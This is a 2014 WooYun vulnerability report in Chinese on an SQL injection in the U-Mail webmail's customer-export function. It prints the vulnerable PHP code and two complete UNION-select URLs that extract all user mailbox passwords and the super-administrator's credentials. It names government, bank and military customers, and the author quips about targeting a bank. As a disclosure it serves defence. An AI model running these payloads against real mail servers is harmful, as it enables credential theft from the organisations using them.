当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072898

漏洞标题:U-Mail邮件服务系统存在漏洞可获取所有用户密码

相关厂商:U-Mail邮件服务系统

漏洞作者: 路人甲

提交时间:2014-08-18 18:32

修复时间:2014-10-02 18:34

公开时间:2014-10-02 18:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-18: 细节已通知厂商并且等待厂商处理中
2014-08-23: 厂商已经确认,细节仅向厂商公开
2014-09-02: 细节向核心白帽子及相关领域专家公开
2014-09-12: 细节向普通白帽子公开
2014-09-22: 细节向实习白帽子公开
2014-10-02: 细节向公众公开

简要描述:

产品介绍(摘自官网)
U-Mail专注于电子邮件领域15年,为企业轻松搭建最安全稳定的电子邮件系统软件。
关键字:15年 最安全 最稳定
涉及:金融、政府、银行,石油、军队、证券行业等重要部门,影响非常巨大,经测试受影响率:99.8%~100%
场外话:我很想把农业银行拿下来的,想想还是算了,毕竟随便改卡里的数字,成土豪了,这样是极其不安全的..

详细说明:

#1 产品介绍
U-Mail邮件服务器,为企业轻松搭建最安全稳定的电子邮件系统软件。U-Mail专注于电子邮件领域15年,将广大企事业单位对邮箱服务器软件稳定安全的各类需求,与电子邮件应用管理的多样化、个性化为目标做深入开发,最大化拓展企业邮箱系统功能的灵活性和稳定性,使之成为政府部门、大专院校、中小学校、企事业集团和从事销售企业邮箱软件的网络服务商、集成商最理想的企业邮局系统架设软件。
支持数字证书服务并提供强大的管理功能,可直接在WebMail中撰写或阅读经过数字签名或数字加密的安全邮件(S/MIME)。提供军事级别的高安全强度(4096位DH/DSS加密或2048位RSA加密);
使用TLS/SSL标准安全套接字层通讯协议(1024位RSA加密),支持包括 SSL SMTP, SSL POP3, SSL IMAP4 安全通讯服务,防止网络侦听,使得通信更安全。
#2 U-Mail客户案例
中国外交部
中国农业银行
福州市人大常委会
南宁国际机场
上海电信公司
酒泉卫星发射中心
国家环境保护总局
浦发银行呼和浩特分行
四川省知识产权局
晋中商业银行
华夏航空
国测卫星中心
广元贵商银行
国家保密技术研究所
中华人民共和国厦门海事局
威海市商业银行 ...
还有很多很多就不一一列举了...
#3 先来说说真正的漏洞
漏洞文件
/client/cab/module/operates.php
代码如下(代码是Zend加密的,但是呢..)

if ( ACTION == "customer-export" )
{
$cate_id = gss( $_GET['cate_id'] ) ? gss( $_GET['cate_id'] ) : "-1";
if ( $cate_id )
{
$data_cache = $CAB->getCategoryByDomainID( $domain_id, 0 );
$where = "domain_id='".$domain_id."'";
if ( $cate_id == "-1" )
{
$cate_id = 0;
}
if ( $cate_id )
{
$Tree = $CAB->getTreeObject( );
$Tree->set_data_cache( $data_cache );
$Tree->sort_data( -1, 1 );
$cate_ids = $Tree->get_child_id( $cate_id );
$where .= " AND cate_id IN (".$cate_ids.")";
}
$customer_list = $CAB->get_customer( array(
"fields" => "*",
"where" => $where,
"debug" => 0
) );
$cate_list = create_array( $data_cache, "cate_id", "name" );
$string = "\"".el( "名称", "" )."\",\"".el( "邮箱", "" )."\",\"".el( "电话号码", "" )."\",\"".el( "分类", "" )."\",\"".el( "备注", "" )."\",\"".el( "生日", "" )."\",\"".el( "性别", "" )."\",\"".el( "单位电话", "" )."\",\"".el( "住宅电话", "" )."\",\"".el( "QQ", "" )."\",\"".el( "MSN", "" )."\"\n";
if ( $customer_list )
{
foreach ( $customer_list as $user )
{
$string .= "\"".$user['fullname']."\",";
$string .= "\"".$user['pref_email']."\",";
$string .= "\"".$user['pref_tel']."\",";
$string .= "\"".$cate_list[$user['cate_id']]."\",";
$string .= "\"".$user['remark']."\",";
$string .= "\"".$user['birthday']."\",";
$string .= "\"".$user['gender']."\",";
$string .= "\"".$user['work_tel']."\",";
$string .= "\"".$user['home_tel']."\",";
$string .= "\"".$user['im_qq']."\",";
$string .= "\"".$user['im_msn']."\",";
$string .= "\r\n";
}
}
}
if ( get_session( "language" ) == "zh" )
{
$out_data = iconv( "UTF-8", "GBK", $string );
}
else
{
$out_data = $string;
}
header( "Content-type: text/plain" );
header( "Content-Disposition: attachment; filename=Address.csv" );
header( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
header( "Expires: 0" );
header( "Pragma: public" );
echo $out_data;
exit( );
}


$where .= " AND cate_id IN (".$cate_ids.")";
带入查询。

http://192.168.0.119/webmail/client/cab/index.php?module=operate&action=customer-export&cate_id=0) union select 1,2,3,mailbox,5,6,password,8,9,10,11,12,13,14,15 from userlist%23


1.jpg


2.jpg


超级管理员在这个表,同样一键脱下所有

http://192.168.0.119/webmail/client/cab/index.php?module=operate&action=customer-export&cate_id=0) union select 1,2,3,usr_name,5,6,password,8,9,10,11,12,13,14,15 from web_usr%23

漏洞证明:

1.jpg


2.jpg

修复方案:

数组遍历,intval

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-08-23 12:43

厂商回复:

对于所述情况,仅能原理核实,未能在本地或互联网实例上确认(需要认证前提),待通报和处置。

最新状态:

暂无